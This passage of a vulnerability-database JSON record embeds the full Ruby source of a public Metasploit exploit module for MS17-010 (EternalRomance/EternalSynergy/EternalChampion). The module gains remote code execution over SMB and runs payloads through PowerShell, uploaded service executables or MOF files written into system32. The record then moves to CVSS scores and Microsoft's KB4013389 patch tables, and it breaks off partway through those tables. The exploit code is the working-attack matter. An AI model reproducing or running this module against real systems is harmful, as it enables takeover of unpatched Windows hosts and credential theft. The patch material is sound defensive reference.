["MS:CVE-2017-0143", "MS:CVE-2017-0147", "MS:CVE-2017-0146"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "securelist", "idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}], 
"modified": "2018-02-05T20:53:32", "rev": 2}, "score": {"value": 8.9, "vector": "NONE", "modified": "2018-02-05T20:53:32", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "https://www.exploit-db.com/download/43970/", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\n# Windows XP systems that are not part of a domain default to treating all\r\n# network logons as if they were Guest. This prevents SMB relay attacks from\r\n# gaining administrative access to these systems. This setting can be found\r\n# under:\r\n#\r\n# Local Security Settings >\r\n# Local Policies >\r\n# Security Options >\r\n# Network Access: Sharing and security model for local accounts\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010\r\n include Msf::Exploit::Powershell\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::WbemExec\r\n include Msf::Auxiliary::Report\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution',\r\n 'Description' => %q{\r\n This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where\r\n primitive. This will then be used to overwrite the connection session information with as an\r\n Administrator session. From there, the normal psexec payload code execution is done.\r\n\r\n Exploits a type confusion between Transaction and WriteAndX requests and a race condition in\r\n Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy\r\n exploits. 
This exploit chain is more reliable than the EternalBlue exploit, but requires a\r\n named pipe.\r\n },\r\n 'Author' =>\r\n [\r\n 'sleepya', # zzz_exploit idea and offsets\r\n 'zerosum0x0',\r\n 'Shadow Brokers',\r\n 'Equation Group'\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'DefaultOptions' =>\r\n {\r\n 'WfsDelay' => 10,\r\n 'EXITFUNC' => 'thread'\r\n },\r\n 'References' =>\r\n [\r\n [ 'AKA', 'ETERNALSYNERGY' ],\r\n [ 'AKA', 'ETERNALROMANCE' ],\r\n [ 'AKA', 'ETERNALCHAMPION' ],\r\n [ 'AKA', 'ETERNALBLUE'], # does not use any CVE from Blue, but Search should show this, it is preferred\r\n [ 'MSB', 'MS17-010' ],\r\n [ 'CVE', '2017-0143'], # EternalRomance/EternalSynergy - Type confusion between WriteAndX and Transaction requests\r\n [ 'CVE', '2017-0146'], # EternalChampion/EternalSynergy - Race condition with Transaction requests\r\n [ 'CVE', '2017-0147'], # for EternalRomance reference\r\n [ 'URL', 'https://github.com/worawit/MS17-010' ],\r\n [ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ],\r\n [ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ],\r\n ],\r\n 'Payload' =>\r\n {\r\n 'Space' => 3072,\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => 'win',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', { } ],\r\n [ 'PowerShell', { } ],\r\n [ 'Native upload', { } ],\r\n [ 'MOF upload', { } ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Mar 14 2017'\r\n ))\r\n\r\n register_options(\r\n [\r\n OptString.new('SHARE', [ true, \"The share to connect to, can be an admin share (ADMIN$,C$,...) 
or a normal read/write folder share\", 'ADMIN$' ])\r\n ])\r\n\r\n register_advanced_options(\r\n [\r\n OptBool.new('ALLOW_GUEST', [true, \"Keep trying if only given guest access\", false]),\r\n OptString.new('SERVICE_FILENAME', [false, \"Filename to to be used on target for the service binary\",nil]),\r\n OptString.new('PSH_PATH', [false, 'Path to powershell.exe', 'Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe']),\r\n OptString.new('SERVICE_STUB_ENCODER', [false, \"Encoder to use around the service registering stub\",nil])\r\n ])\r\n end\r\n\r\n def exploit\r\n begin\r\n eternal_pwn(datastore['RHOST'])\r\n smb_pwn()\r\n\r\n rescue ::Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010::MS17_010_Error => e\r\n print_error(\"#{e.message}\")\r\n rescue ::Errno::ECONNRESET,\r\n ::Rex::Proto::SMB::Exceptions::LoginError,\r\n ::Rex::HostUnreachable,\r\n ::Rex::ConnectionTimeout,\r\n ::Rex::ConnectionRefused => e\r\n print_error(\"#{e.class}: #{e.message}\")\r\n rescue => error\r\n print_error(error.class.to_s)\r\n print_error(error.message)\r\n print_error(error.backtrace.join(\"\\n\"))\r\n ensure\r\n eternal_cleanup() # restore session\r\n end\r\n end\r\n\r\n def smb_pwn()\r\n case target.name\r\n when 'Automatic'\r\n if powershell_installed?\r\n print_status('Selecting PowerShell target')\r\n powershell\r\n else\r\n print_status('Selecting native target')\r\n native_upload\r\n end\r\n when 'PowerShell'\r\n powershell\r\n when 'Native upload'\r\n native_upload\r\n when 'MOF upload'\r\n mof_upload\r\n end\r\n\r\n handler\r\n end\r\n\r\n\r\n # TODO: Again, shamelessly copypasta from the psexec exploit module. 
Needs to\r\n # be moved into a mixin\r\n\r\n def powershell_installed?\r\n share = \"\\\\\\\\#{datastore['RHOST']}\\\\#{datastore['SHARE']}\"\r\n\r\n case datastore['SHARE'].upcase\r\n when 'ADMIN$'\r\n path = 'System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe'\r\n when 'C$'\r\n path = 'Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe'\r\n else\r\n path = datastore['PSH_PATH']\r\n end\r\n\r\n simple.connect(share)\r\n\r\n vprint_status(\"Checking for #{path}\")\r\n\r\n if smb_file_exist?(path)\r\n vprint_status('PowerShell found')\r\n psh = true\r\n else\r\n vprint_status('PowerShell not found')\r\n psh = false\r\n end\r\n\r\n simple.disconnect(share)\r\n\r\n psh\r\n end\r\n\r\n def powershell\r\n ENV['MSF_SERVICENAME'] = datastore['SERVICE_NAME']\r\n command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)\r\n\r\n if datastore['PSH::persist'] and not datastore['DisablePayloadHandler']\r\n print_warning(\"You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option\")\r\n end\r\n\r\n # Execute the powershell command\r\n print_status(\"Executing the payload...\")\r\n begin\r\n psexec(command)\r\n rescue StandardError => exec_command_error\r\n fail_with(Failure::Unknown, \"#{peer} - Unable to execute specified command: #{exec_command_error}\")\r\n end\r\n end\r\n\r\n def native_upload\r\n filename = datastore['SERVICE_FILENAME'] || \"#{rand_text_alpha(8)}.exe\"\r\n servicename = datastore['SERVICE_NAME'] || rand_text_alpha(8)\r\n serviceencoder = datastore['SERVICE_STUB_ENCODER'] || ''\r\n\r\n # Upload the shellcode to a file\r\n print_status(\"Uploading payload...\")\r\n smbshare = datastore['SHARE']\r\n fileprefix = \"\"\r\n # if SHARE = Users/sasha/ or something like this\r\n if smbshare =~ /.[\\\\\\/]/\r\n subfolder = true\r\n smbshare = datastore['SHARE'].dup\r\n smbshare = smbshare.gsub(/^[\\\\\\/]/,\"\")\r\n folder_list = smbshare.split(/[\\\\\\/]/)\r\n smbshare = 
folder_list[0]\r\n fileprefix = folder_list[1..-1].map {|a| a + \"\\\\\"}.join.gsub(/\\\\$/,\"\") if folder_list.length > 1\r\n simple.connect(\"\\\\\\\\#{datastore['RHOST']}\\\\#{smbshare}\")\r\n fd = smb_open(\"\\\\#{fileprefix}\\\\#(unknown)\", 'rwct')\r\n else\r\n subfolder = false\r\n simple.connect(\"\\\\\\\\#{datastore['RHOST']}\\\\#{smbshare}\")\r\n fd = smb_open(\"\\\\#(unknown)\", 'rwct')\r\n end\r\n exe = ''\r\n opts = { :servicename => servicename, :serviceencoder => serviceencoder}\r\n begin\r\n exe = generate_payload_exe_service(opts)\r\n\r\n fd << exe\r\n ensure\r\n fd.close\r\n end\r\n\r\n if subfolder\r\n print_status(\"Created \\\\#{fileprefix}\\\\#(unknown)...\")\r\n else\r\n print_status(\"Created \\\\#(unknown)...\")\r\n end\r\n\r\n # Disconnect from the share\r\n simple.disconnect(\"\\\\\\\\#{datastore['RHOST']}\\\\#{smbshare}\")\r\n\r\n # define the file location\r\n if datastore['SHARE'] == 'ADMIN$'\r\n file_location = \"%SYSTEMROOT%\\\\#(unknown)\"\r\n elsif datastore['SHARE'] =~ /^[a-zA-Z]\\$$/\r\n file_location = datastore['SHARE'].slice(0,1) + \":\\\\#(unknown)\"\r\n else\r\n file_location = \"\\\\\\\\127.0.0.1\\\\#{smbshare}\\\\#{fileprefix}\\\\#(unknown)\"\r\n end\r\n\r\n psexec(file_location, false)\r\n\r\n unless datastore['SERVICE_PERSIST']\r\n print_status(\"Deleting \\\\#(unknown)...\")\r\n #This is not really useful but will prevent double \\\\ on the wire :)\r\n if datastore['SHARE'] =~ /.[\\\\\\/]/\r\n simple.connect(\"\\\\\\\\#{datastore['RHOST']}\\\\#{smbshare}\")\r\n begin\r\n simple.delete(\"\\\\#{fileprefix}\\\\#(unknown)\")\r\n rescue XCEPT::ErrorCode => e\r\n print_error(\"Delete of \\\\#{fileprefix}\\\\#(unknown) failed: #{e.message}\")\r\n end\r\n else\r\n simple.connect(\"\\\\\\\\#{datastore['RHOST']}\\\\#{smbshare}\")\r\n begin\r\n simple.delete(\"\\\\#(unknown)\")\r\n rescue XCEPT::ErrorCode => e\r\n print_error(\"Delete of \\\\#(unknown) failed: #{e.message}\")\r\n end\r\n end\r\n end\r\n end\r\n\r\n 
def mof_upload\r\n share = \"\\\\\\\\#{datastore['RHOST']}\\\\ADMIN$\"\r\n filename = datastore['SERVICE_FILENAME'] || \"#{rand_text_alpha(8)}.exe\"\r\n\r\n # payload as exe\r\n print_status(\"Trying wbemexec...\")\r\n print_status(\"Uploading Payload...\")\r\n if datastore['SHARE'] != 'ADMIN$'\r\n print_error('Wbem will only work with ADMIN$ share')\r\n return\r\n end\r\n simple.connect(share)\r\n exe = generate_payload_exe\r\n fd = smb_open(\"\\\\system32\\\\#(unknown)\", 'rwct')\r\n fd << exe\r\n fd.close\r\n print_status(\"Created %SystemRoot%\\\\system32\\\\#(unknown)\")\r\n\r\n # mof to cause execution of above\r\n mofname = rand_text_alphanumeric(14) + \".MOF\"\r\n mof = generate_mof(mofname, filename)\r\n print_status(\"Uploading MOF...\")\r\n fd = smb_open(\"\\\\system32\\\\wbem\\\\mof\\\\#{mofname}\", 'rwct')\r\n fd << mof\r\n fd.close\r\n print_status(\"Created %SystemRoot%\\\\system32\\\\wbem\\\\mof\\\\#{mofname}\")\r\n\r\n # Disconnect from the ADMIN$\r\n simple.disconnect(share)\r\n end\r\n\r\n def report_auth\r\n service_data = {\r\n address: ::Rex::Socket.getaddress(datastore['RHOST'],true),\r\n port: datastore['RPORT'],\r\n service_name: 'smb',\r\n protocol: 'tcp',\r\n workspace_id: myworkspace_id\r\n }\r\n\r\n credential_data = {\r\n origin_type: :service,\r\n module_fullname: self.fullname,\r\n private_data: datastore['SMBPass'],\r\n username: datastore['SMBUser'].downcase\r\n }\r\n\r\n if datastore['SMBDomain'] and datastore['SMBDomain'] != 'WORKGROUP'\r\n credential_data.merge!({\r\n realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,\r\n realm_value: datastore['SMBDomain']\r\n })\r\n end\r\n\r\n if datastore['SMBPass'] =~ /[0-9a-fA-F]{32}:[0-9a-fA-F]{32}/\r\n credential_data.merge!({:private_type => :ntlm_hash})\r\n else\r\n credential_data.merge!({:private_type => :password})\r\n end\r\n\r\n credential_data.merge!(service_data)\r\n\r\n credential_core = create_credential(credential_data)\r\n\r\n login_data = {\r\n 
access_level: 'Admin',\r\n core: credential_core,\r\n last_attempted_at: DateTime.now,\r\n status: Metasploit::Model::Login::Status::SUCCESSFUL\r\n }\r\n\r\n login_data.merge!(service_data)\r\n create_credential_login(login_data)\r\n end\r\nend", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "e6f53676ca888a6a837a24417efa2477"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "78e989de00446befd491b80d94f241f6"}, {"key": "href", "hash": "ced5a2b3b6df6c4dae430e5843571b2e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "eaa4ed87336e2e51d149ce6e262dadbe"}, {"key": "published", "hash": 
"eaa4ed87336e2e51d149ce6e262dadbe"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "e53848d9c7e659c4bd32f7af7ff99515"}, {"key": "title", "hash": "2882fa4f749f1c5065df21f921150959"}, {"key": "type", "hash": "916b5dbd201b469998d9b4a4c8bc4e08"}], "scheme": null}], "mskb": [{"id": "KB4013389", "hash": "f19980cc75a4f673cb3f8f550cf4b644c08430201b0e2682e360bf35a84f9788", "type": "mskb", "bulletinFamily": "microsoft", "title": "MS17-010: Security update for Windows SMB Server: March 14, 2017", "description": "<html><body><p>Resolves a vulnerability in Windows that could allow remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server.</p><h2>Summary</h2><div class=\"kb-summary-section section\">This security update resolves vulnerabilities in Microsoft Windows. The most severe of the vulnerabilities could allow remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server.<br/>To learn more about the vulnerability, see <a href=\"https://technet.microsoft.com/library/security/MS17-010\" id=\"kb-link-2\" target=\"_self\">Microsoft Security Bulletin MS17-010</a>. </div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><span class=\"text-base\">Important </span><ul class=\"sbody-free_list\"><li>All future security and non-security updates for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2 require update <a href=\"https://support.microsoft.com/en-us/help/2919355\" id=\"kb-link-3\" target=\"_self\">2919355</a> to be installed. We recommend that you install update <a href=\"https://support.microsoft.com/en-us/help/2919355\" id=\"kb-link-4\" target=\"_self\">2919355</a> on your Windows RT 8.1-based, Windows 8.1-based, or Windows Server 2012 R2-based computer so that you receive future updates. 
</li><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a href=\"https://technet.microsoft.com/en-us/library/hh825699\" id=\"kb-link-5\" target=\"_self\">Add language packs to Windows</a>. </li></ul></div><h2>Additional information about this security update</h2><div class=\"kb-moreinformation-section section\"><br/><div>The following articles contain more information about this security update as it relates to individual product versions. These articles may contain known issue information. </div><br/><br/><ul id=\"info1_list1\"><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012598\" managed-link=\"\" target=\"\"> 4012598</a> MS17-010: Description of the security update for Windows SMB Server: March 14, 2017</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012216\" managed-link=\"\" target=\"\"> 4012216</a> March 2017 Security Monthly Quality Rollup for Windows 8.1 and Windows Server 2012 R2</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012213\" managed-link=\"\" target=\"\"> 4012213</a> March 2017 Security Only Quality Update for Windows 8.1 and Windows Server 2012 R2</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012217\" managed-link=\"\" target=\"\"> 4012217</a> March 2017 Security Monthly Quality Rollup for Windows Server 2012</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012214\" managed-link=\"\" target=\"\"> 4012214</a> March 2017 Security Only Quality Update for Windows Server 2012</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" 
href=\"http://support.microsoft.com/kb/4012215\" managed-link=\"\" target=\"\"> 4012215</a> March 2017 Security Monthly Quality Rollup for Windows 7 SP1 and Windows Server 2008 R2 SP1</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012212\" managed-link=\"\" target=\"\"> 4012212</a> March 2017 Security Only Quality Update for Windows 7 SP1 and Windows Server 2008 R2 SP1</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4013429\" managed-link=\"\" target=\"\"> 4013429</a> March 13, 2017\u2014KB4013429 (OS Build 933)</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012606\" managed-link=\"\" target=\"\"> 4012606</a> March 14, 2017\u2014KB4012606 (OS Build 17312)</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4013198\" managed-link=\"\" target=\"\"> 4013198</a> March 14, 2017\u2014KB4013198 (OS Build 830)</li></ul></div><h2>Security update deployment</h2><span><h3><strong>Windows Vista (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. 
</p><table class=\"table\"><tbody><tr> <td width=\"26%\"><p><strong>Security update file names</strong></p></td> <td width=\"73%\"><p>For all supported 32-bit editions of Windows Vista:<br/><strong>Windows6.0-KB4012598-x86.msu</strong></p></td> </tr><tr> <td width=\"26%\"><p>\u00a0</p></td> <td width=\"73%\"><p>For all supported x64-based editions of Windows Vista:<br/><strong>Windows6.0-KB4012598-x64.msu</strong></p></td> </tr><tr> <td width=\"26%\"><p><strong>Installation switches</strong></p></td> <td width=\"73%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><span><u>Microsoft Knowledge Base article 934307</u></span></a></p></td> </tr><tr> <td width=\"26%\"><p><strong>Restart requirement</strong></p></td> <td width=\"73%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"26%\"><p><strong>Removal information</strong></p></td> <td width=\"73%\"><p>WUSA.exe does not support uninstall of updates. To uninstall an update installed by WUSA, click <strong>Control Panel</strong>, and then click <strong>Security</strong>. Under \"Windows Update,\" click <strong>View installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"26%\"><p><strong>File information</strong></p></td> <td width=\"73%\"><p>See <a href=\"https://support.microsoft.com/kb/4012598\"><span><u>Microsoft Knowledge Base article 4012598</u></span></a></p></td> </tr><tr> <td width=\"26%\"><p><strong>Registry key verification</strong></p></td> <td width=\"73%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p>\u00a0</p><h3><strong>Windows Server 2008 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. 
</p><table class=\"table\"><tbody><tr> <td width=\"26%\"><p><strong>Security update file names</strong></p></td> <td width=\"73%\"><p>For all supported 32-bit editions of Windows Server 2008:<br/><strong>Windows6.0-KB4012598-x86.msu</strong></p></td> </tr><tr> <td width=\"26%\"><p>\u00a0</p></td> <td width=\"73%\"><p>For all supported x64-based editions of Windows Server 2008:<br/><strong>Windows6.0-KB4012598-x64.msu</strong></p></td> </tr><tr> <td width=\"26%\"><p>\u00a0</p></td> <td width=\"73%\"><p>For all supported Itanium-based editions of Windows Server 2008<br/><strong>Windows6.0-KB4012598-ia64.msu</strong></p></td> </tr><tr> <td width=\"26%\"><p><strong>Installation switches</strong></p></td> <td width=\"73%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><span><u>Microsoft Knowledge Base article 934307</u></span></a></p></td> </tr><tr> <td width=\"26%\"><p><strong>Restart requirement</strong></p></td> <td width=\"73%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"26%\"><p><strong>Removal information</strong></p></td> <td width=\"73%\"><p>WUSA.exe does not support uninstall of updates. To uninstall an update installed by WUSA, click <strong>Control Panel</strong>, and then click <strong>Security</strong>. Under \"Windows Update,\" click <strong>View installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"26%\"><p><strong>File information</strong></p></td> <td width=\"73%\"><p>See <a href=\"https://support.microsoft.com/kb/4012598\"><span><u>Microsoft Knowledge Base article 4012598</u></span></a></p></td> </tr><tr> <td width=\"26%\"><p><strong>Registry key verification</strong></p></td> <td width=\"73%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. 
</p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows 7 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"29%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 7:<br/><strong>Windows6.1-KB4012212-x64.msu</strong><br/>Security only</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 7:<br/><strong>Windows6.1-KB4012215-x64.msu</strong><br/>Monthly rollup</p></td> </tr><tr> <td width=\"29%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a><span><u> </u></span></p></td> </tr><tr> <td width=\"29%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall </strong>setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, and then under \"Windows Update,\" click <strong>View installed updates</strong> and select from the list of updates. 
</p></td> </tr><tr> <td width=\"29%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/4012212\"><u>Microsoft Knowledge Base article 4012212</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012215\"><u>Microsoft Knowledge Base article 4012215</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows Server 2008 R2 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"29%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows Server 2008 R2:<br/><strong>Windows6.1-KB4012212-x64.msu</strong><br/>Security only</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows Server 2008 R2:<br/><strong>Windows6.1-KB4012215-x64.msu</strong><br/>Monthly rollup</p></td> </tr><tr> <td width=\"29%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. 
</p></td> </tr><tr> <td width=\"29%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall</strong> setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, and then under \"Windows Update,\" click <strong>View installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"29%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/4012212\"><u>Microsoft Knowledge Base article 4012212</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012215\"><u>Microsoft Knowledge Base article 4012215</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows 8.1 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. 
</p><table class=\"table\"><tbody><tr> <td width=\"29%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 8.1:<br/><strong>Windows8.1-KB4012213-x64.msu</strong><br/>Security only</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 8.1:<br/><strong>Windows8.1-KB4012216-x64.msu</strong><br/>Monthly rollup</p></td> </tr><tr> <td width=\"29%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall</strong> setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, click <strong>Windows Update</strong>, and then under \"See also,\" click <strong>Installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"29%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/4012213\"><u>Microsoft Knowledge Base article 4012213</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012216\"><u>Microsoft Knowledge Base article 4012216</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. 
</p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows RT 8.1 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"29%\"><p><strong>Deployment</strong></p></td> <td width=\"71%\"><p>The 4012216 monthly rollup update is available via <a href=\"http://go.microsoft.com/fwlink/?LinkId=21130\"><u>Windows Update</u></a> only. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Restart requirement</strong></p></td> <td width=\"71%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Removal information</strong></p></td> <td width=\"71%\"><p>Click <strong>Control Panel</strong>, click <strong>System and Security</strong>, click <strong>Windows Update</strong>, and then under \"See also,\" click <strong>Installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"29%\"><p><strong>File information</strong></p></td> <td width=\"71%\"><p>See <a href=\"https://support.microsoft.com/kb/4012213\"><u>Microsoft Knowledge Base article 4012213</u></a></p></td> </tr> </tbody></table><h3><strong>Windows Server 2012 and Windows Server 2012 R2 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. 
</p><table class=\"table\"><tbody><tr> <td width=\"29%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported editions of Windows Server 2012:<br/><strong>Windows8-RT-KB4012214-x64.msu</strong><br/>Security only</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported editions of Windows Server 2012:<br/><strong>Windows8-RT-KB4012217-x64.msu</strong><br/>Monthly rollup</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported editions of Windows Server 2012 R2:<br/><strong>Windows8.1-KB4012213-x64.msu</strong><br/>Security only</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported editions of Windows Server 2012 R2:<br/><strong>Windows8.1-KB4012216-x64.msu</strong><br/>Monthly rollup</p></td> </tr><tr> <td width=\"29%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. 